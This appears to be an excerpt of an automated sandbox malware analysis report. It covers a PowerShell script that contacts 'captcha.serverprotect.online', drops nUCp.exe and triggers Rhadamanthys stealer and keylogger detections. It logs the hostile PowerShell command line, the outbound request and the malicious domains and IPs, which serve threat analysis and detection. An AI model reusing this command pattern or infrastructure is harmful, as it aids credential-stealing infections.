Sep 15, 2024 15:03:13.097275972 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:13.097419024 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:13.097687006 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:13.097708941 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:14.086066008 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:14.086159945 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:14.086291075 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:14.086352110 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:14.086369038 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:14.914966106 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:14.915064096 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:14.920995951 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:14.921005011 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:14.921241045 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:14.922149897 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:14.963397980 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:19.693538904 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:19.693695068 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:19.693852901 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:19.693964958 CEST	49712	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:19.694006920 CEST	443	49712	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:20.679893017 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:20.679929018 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:20.680008888 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:20.680114985 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:20.680124998 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:21.397773027 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:21.397897005 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:21.402395010 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:21.402406931 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:21.402673006 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:21.403403997 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:21.447428942 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:26.285810947 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:26.285897970 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:26.285945892 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:26.286014080 CEST	49713	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:26.286036968 CEST	443	49713	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:27.273864031 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:27.273920059 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:27.274045944 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:27.274118900 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:27.274131060 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:28.135008097 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:28.135101080 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:28.139404058 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:28.139413118 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:28.140175104 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:28.140897989 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:28.187397957 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:32.901952982 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:32.902040005 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:32.902194023 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:32.902194023 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:32.910686016 CEST	49714	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:32.910702944 CEST	443	49714	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:33.914660931 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:33.914719105 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:33.914825916 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:33.914922953 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:33.914935112 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:34.614497900 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:34.614701986 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:34.627546072 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:34.627621889 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:34.628423929 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:34.629206896 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:34.671436071 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:39.518693924 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:39.518862963 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:39.518933058 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:39.518974066 CEST	49715	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:39.518995047 CEST	443	49715	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:40.508490086 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:40.508569956 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:40.508672953 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:40.508749008 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:40.508771896 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:41.357152939 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:41.357261896 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:41.361504078 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:41.361517906 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:41.362390995 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:41.363122940 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:41.407402039 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:46.124522924 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:46.124685049 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:46.124897957 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:46.124897957 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:46.124990940 CEST	49716	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:46.125025988 CEST	443	49716	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:47.133379936 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:47.133430958 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:47.133559942 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:47.133611917 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:47.133621931 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:47.958138943 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:47.958250046 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:47.962470055 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:47.962486029 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:47.962807894 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:47.963499069 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:48.011396885 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:52.733151913 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:52.733247995 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:52.733383894 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:52.733383894 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:52.733491898 CEST	49717	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:52.733513117 CEST	443	49717	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:53.727063894 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:53.727114916 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:53.727202892 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:53.727268934 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:53.727278948 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:54.443918943 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:54.444072008 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:54.468029976 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:54.468063116 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:54.468409061 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:54.469126940 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:54.511404991 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:59.347956896 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:59.348050117 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:59.348110914 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:59.348134041 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:59.348151922 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:59.348172903 CEST	49718	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:59.348179102 CEST	443	49718	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:00.372951984 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:00.373013973 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:00.373100996 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:00.373148918 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:00.373157978 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:01.066612005 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:01.066833973 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:01.074573994 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:01.074588060 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:01.074825048 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:01.076432943 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:01.123399019 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:05.973757982 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:05.973849058 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:05.973901033 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:05.990833044 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:05.990875959 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:05.990895987 CEST	49719	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:05.990904093 CEST	443	49719	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:06.992726088 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:06.992783070 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:06.992908001 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:06.992975950 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:06.993001938 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:07.818010092 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:07.818099976 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:07.823620081 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:07.823658943 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:07.824018002 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:07.824771881 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:07.867396116 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:12.598639965 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:12.598727942 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:12.598786116 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:12.598891020 CEST	49720	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:12.598915100 CEST	443	49720	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:13.586472034 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:13.586519003 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:13.586577892 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:13.586636066 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:13.586642027 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:14.618195057 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:14.618320942 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:14.623734951 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:14.623754025 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:14.624097109 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:14.630269051 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:14.675401926 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:19.189392090 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:19.189572096 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:19.189640999 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:19.189735889 CEST	49721	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:19.189757109 CEST	443	49721	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:20.195909977 CEST	49722	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:20.195964098 CEST	443	49722	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:20.196073055 CEST	49722	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:20.196161032 CEST	49722	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:20.196170092 CEST	443	49722	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:20.894500017 CEST	443	49722	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:20.894634962 CEST	49722	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:20.901726007 CEST	49722	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:20.901753902 CEST	443	49722	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:20.902075052 CEST	443	49722	194.113.106.180	192.168.2.10
Sep 15, 2024 15:04:20.924421072 CEST	49722	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:04:20.967406988 CEST	443	49722	194.113.106.180	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2024 15:02:18.281922102 CEST	53972	53	192.168.2.10	1.1.1.1
Sep 15, 2024 15:02:18.305391073 CEST	53	53972	1.1.1.1	192.168.2.10
Sep 15, 2024 15:02:24.919368029 CEST	61911	53	192.168.2.10	1.1.1.1
Sep 15, 2024 15:02:24.945310116 CEST	53	61911	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 15, 2024 15:02:18.281922102 CEST	192.168.2.10	1.1.1.1	0x3e54	Standard query (0)	captcha.serverprotect.online	A (IP address)	IN (0x0001)	false
Sep 15, 2024 15:02:24.919368029 CEST	192.168.2.10	1.1.1.1	0xc10a	Standard query (0)	deadmunky.nl	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 15, 2024 15:02:18.305391073 CEST	1.1.1.1	192.168.2.10	0x3e54	No error (0)	captcha.serverprotect.online	104.21.82.103	A (IP address)	IN (0x0001)	false
Sep 15, 2024 15:02:18.305391073 CEST	1.1.1.1	192.168.2.10	0x3e54	No error (0)	captcha.serverprotect.online	172.67.200.41	A (IP address)	IN (0x0001)	false
Sep 15, 2024 15:02:24.945310116 CEST	1.1.1.1	192.168.2.10	0xc10a	No error (0)	deadmunky.nl	194.113.106.180	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

captcha.serverprotect.online

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49700	104.21.82.103	443	7316	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-15 13:02:19 UTC	296	OUT	POST /98aa7e1ce731c6206ebbe457e9f2dc7088adc3c628bee08/verify HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/x-www-form-urlencoded Host: captcha.serverprotect.online Content-Length: 0 Connection: Keep-Alive
2024-09-15 13:02:19 UTC	1309	IN	HTTP/1.1 404 Not Found Date: Sun, 15 Sep 2024 13:02:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval';img-src 'self' cdn.discordapp.com;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 0 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FuF43JeoqhMAqUT5LOSzO%2Bz9h%2By3fEAHk625AHJJQmuTlnrGf%2F%2FKSw770iowiD983krP0KPpLapaLsdWPF4WpjHEvZscp7GjHELFjKx3u6E2OiRG8%2Bl9YssPG6EiXpwnTOZHITt%2Bj2AqxaXxVMBn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c38cf795b637d06-EWR alt-svc: h3=":443"; ma=86400
2024-09-15 13:02:19 UTC	18	IN	Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: d404 Not Found
2024-09-15 13:02:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:02:13
Start date:	15/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:02:13
Start date:	15/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:02:16
Start date:	15/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\conhost.exe" C:\Users\Public\Documents\nUCp.exe
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:02:16
Start date:	15/09/2024
Path:	C:\Users\Public\Documents\nUCp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Documents\nUCp.exe
Imagebase:	0xfa0000
File size:	232'448 bytes
MD5 hash:	FFFAAB9CB76179E7C9CC424C7519F8AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000003.1389217701.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.1392146550.0000000004760000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000003.1393080101.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:02:20
Start date:	15/09/2024
Path:	C:\Windows\SysWOW64\OpenWith.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\openwith.exe"
Imagebase:	0x70000
File size:	107'368 bytes
MD5 hash:	0ED31792A7FFF811883F80047CBCFC91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000005.00000003.1419467605.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000005.00000002.1463969465.0000000004550000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000005.00000003.1393293145.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.1395128336.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:02:27
Start date:	15/09/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\openwith.exe"
Imagebase:	0x7ff69b6a0000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000006.00000003.1511743151.0000011F7B4C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:02:49
Start date:	15/09/2024
Path:	C:\Program Files\Windows Media Player\setup_wm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\setup_wm.exe"
Imagebase:	0x7ff7df220000
File size:	1'857'024 bytes
MD5 hash:	F32C225D11A5AF5906CF7C15FDA955E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:02:51
Start date:	15/09/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\dllhost.exe"
Imagebase:	0x7ff6f7fc0000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00007FF7C0D92329 Relevance: 3.2, Strings: 2, Instructions: 698COMMON

Download Yara Rule

Strings

x6z, xrefs: 00007FF7C0D92376
x6z, xrefs: 00007FF7C0D92437

Memory Dump Source

Source File: 00000000.00000002.1405199053.00007FF7C0D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0d90000_powershell.jbxd

Similarity

API ID:
String ID: x6z$x6z
API String ID: 0-2525929240
Opcode ID: 8ad8594278eeda71995464ee89be59a5fc159a7a0e3032db0ebdc0d3fd738dbd
Instruction ID: 5f84a44a75ffa69eaeb2a9bffac3a3b1dd732de394b236cce40deeda17a04242
Opcode Fuzzy Hash: 8ad8594278eeda71995464ee89be59a5fc159a7a0e3032db0ebdc0d3fd738dbd
Instruction Fuzzy Hash: 5F22387190DBC94FE356EB6898556B5BFE0EF56270B4801FEC08DC7293DE28A806C791

Function 00007FF7C0D92159 Relevance: 1.1, Instructions: 1121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1405199053.00007FF7C0D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52c00d0fe77f237f2091e2c42fa9a0bd2b5c3633ba4f967793c77e7f81ded77
Instruction ID: 19e568acad4eaed87fbe5b5a6f2ddc200cdf2f3cf44dc4b46a088f237413c6d8
Opcode Fuzzy Hash: d52c00d0fe77f237f2091e2c42fa9a0bd2b5c3633ba4f967793c77e7f81ded77
Instruction Fuzzy Hash: 3A82BE70A0CA898FDB99EF288855678B7E2FF55724B9401BDC00EC7292DF25BC46C791

Function 00007FF7C0D928B6 Relevance: 1.0, Instructions: 1035COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1405199053.00007FF7C0D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
